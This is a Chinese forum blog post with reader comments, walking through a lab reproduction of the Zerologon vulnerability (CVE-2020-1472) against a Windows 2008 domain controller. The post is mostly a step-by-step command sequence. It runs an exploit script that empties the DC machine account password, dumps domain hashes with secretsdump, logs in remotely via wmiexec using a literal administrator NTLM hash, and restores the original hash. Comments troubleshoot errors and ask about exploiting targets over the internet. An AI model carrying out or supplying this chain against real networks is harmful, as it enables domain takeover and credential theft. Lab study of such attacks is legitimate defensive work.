CVE-2020-1472 复现

2020-09-15 23:07:09 30 2346


攻击机:kali2020      受害者:windows2008
https://github.com/SecuraBV/CVE-2020-1472    poc
https://github.com/dirkjanm/CVE-2020-1472     exp

1、本地搭建一个域环境


2、使用poc验证
既然提示安装东西,那就   pip install -r requirements.txt  ,之后再执行     python3 zerologon_tester.py <主机名> <ip>

3、使用exp攻击,但是这个时候很多人的脚本回报错,是因为缺少 impacket,https://github.com/SecureAuthCorp/impacket  ,python3 setup.py install  //安装impacket,然后执行exp
python3 cve-2020-1472-exploit.py owa 192.168.137.137

4、使用impacket的secretsdump.py导出域控制上的hash
python3 secretsdump.py god.org/owa\$@192.168.137.137 -no-pass


5、利用获取到的管理员hash来远程操作域控服务器
python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:13cf6cfe1f2fc41cd286c7c8caec978b god.org/liukaifeng01@192.168.137.137





6、获取管理员hash,远程连接导出sam数据库中的原来的计算机hash


python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL


7、恢复计算机的hash
下载脚本 https://github.com/risksense/zerologon
python3 reinstall_original_pw.py owa 192.168.137.137 ad611ebf4fd2de9448a33ba693b212f4     //注意hash的部分,只有后半部分


8、恢复计算机的hash
使用impacket的脚本来登录域控来验证hash
使用7步骤的脚本回复hash前

使用7步骤脚本恢复hash后

关于作者

评论30次

要评论?请先  登录  或  注册
  • 30楼
    前天 07:33

    exp链接里的文件是restorepassword.py,你那是改了名还是压根不是用的这个?

  • 29楼
    前天 07:28

    from impacket.dcerpc.v5.nrpc import NetrServerPasswordSet2Response, NetrServerPasswordSet2ImportError: cannot import name 'NetrServerPasswordSet2Response' from 'impacket.dcerpc.v5.nrpc'一直报错

  • 28楼
    4 天前 10:36

    成功是成功了,就是不知道为啥域内的应用都登录不了了,按理说是改的域控本地管理啊

  • 27楼
    7 天前 15:34
    TO_OT

    @abc188174 @moimou @Nolan @q1af4n 几位表哥,感觉你们技术比较好,想请教你们两个问题;1.这个漏洞在外网能否利用,打目标机器?2.利用条件,目标必须是域控机器才行吗?如果只是域内成员,但不是域控,还能利用吗?

    1

    有表哥说socks代理可以使用,所以理论来说外网可以使用(域控外网的很少的),其次就是这个漏洞是针是NetLogon 特权提升漏洞,以我的理解这个漏洞是只针对域控,只有域控才会安装NetLogon

  • 26楼
    7 天前 10:20

    @abc188174 @moimou @Nolan @q1af4n 几位表哥,感觉你们技术比较好,想请教你们两个问题;1.这个漏洞在外网能否利用,打目标机器?2.利用条件,目标必须是域控机器才行吗?如果只是域内成员,但不是域控,还能利用吗?

  • 25楼
    2020-9-17 16:31

    mimikatz刚发的新版已经集成好了

  • 24楼
    2020-9-17 14:38
    ly55521

    exp 的时候执行出错, 已安装 github 的 impacketPerforming authentication attempts...=================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================Target vulnerable, changing account password to empty stringTraceback (most recent call last): File "cve-2020-1472-exploit.py", line 106, in <module> perform_attack('\\\\' + dc_name, dc_ip, dc_name) File "cve-2020-1472-exploit.py", line 84, in perform_attack result = exploit(dc_handle, rpc_con, target_computer) File "cve-2020-1472-exploit.py", line 57, in exploit request = nrpc.NetrServerPasswordSet2()AttributeError: module 'impacket.dcerpc.v5.nrpc' has no attribute 'NetrServerPasswordSet2'

    1

    我知道了,我的是要下载后 执行 python3 -m pip install

  • 23楼
    2020-9-17 14:34

    exp 的时候执行出错, 已安装 github 的impacketPerforming authentication attempts...=================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================Target vulnerable, changing account password to empty stringTraceback (most recent call last):File "cve-2020-1472-exploit.py", line 106, in <module> perform_attack('\\\\' + dc_name, dc_ip, dc_name)File "cve-2020-1472-exploit.py", line 84, in perform_attack result = exploit(dc_handle, rpc_con, target_computer)File "cve-2020-1472-exploit.py", line 57, in exploit request = nrpc.NetrServerPasswordSet2()AttributeError: module 'impacket.dcerpc.v5.nrpc' has no attribute 'NetrServerPasswordSet2'

  • 22楼
    2020-9-17 14:09
    wllhm_27301

    第六步到第八步是要干嘛啊

    1
    abc188174

    恢复原来的hash值,不然随意的改变hash会对域,dns或者一些其他的功能可能造成影响

    2

    还有这个域$用户的口令 我这边怎么解不开啊 我什么时候配置的啊怎么都不知道我配的都是弱口令啊加密方式的问题

  • 21楼
    2020-9-17 12:35
    wllhm_27301

    第六步到第八步是要干嘛啊

    1
    abc188174

    恢复原来的hash值,不然随意的改变hash会对域,dns或者一些其他的功能可能造成影响

    2

    恢复的是“域$”用户的吗?

  • 20楼
    2020-9-17 11:26

    最关键的还是impacket需要最新的

  • 19楼
    2020-9-17 08:00
    wllhm_27301

    第六步到第八步是要干嘛啊

    1

    恢复原来的hash值,不然随意的改变hash会对域,dns或者一些其他的功能可能造成影响

  • 18楼
    2020-9-17 00:43

    第六步到第八步是要干嘛啊

  • 17楼
    2020-9-16 16:07
    darker

    第五步连接失败啥原因啊

    1

    会不会是hash选择错了,这个我导出的hash是所有的hash,选择域控的hash才可以连接域控服务器

  • 16楼
    2020-9-16 15:06

    第五步连接失败啥原因啊

  • 15楼
    2020-9-16 14:43

    win server 2012以上可以成功吗?

  • 14楼
    2020-9-16 12:56
    895515845

    装了impacket还一直报错是咋回事呢

    1

    用python3安装,别直接python

  • 13楼
    2020-9-16 12:45
    895515845

    装了impacket还一直报错是咋回事呢

    1

    还有个就是impacket要最新版

  • 12楼
    2020-9-16 12:44
    895515845

    装了impacket还一直报错是咋回事呢

    1

    我遇到一个报错是connect refuce,那是因为被防火墙拦截了,你测试一下端口能通吗,nc -znv ip 139

  • 11楼
    2020-9-16 11:35
    895515845

    装了impacket还一直报错是咋回事呢

    1

    我用的kali2020不报错,我另一个kali执行poc脚本都报错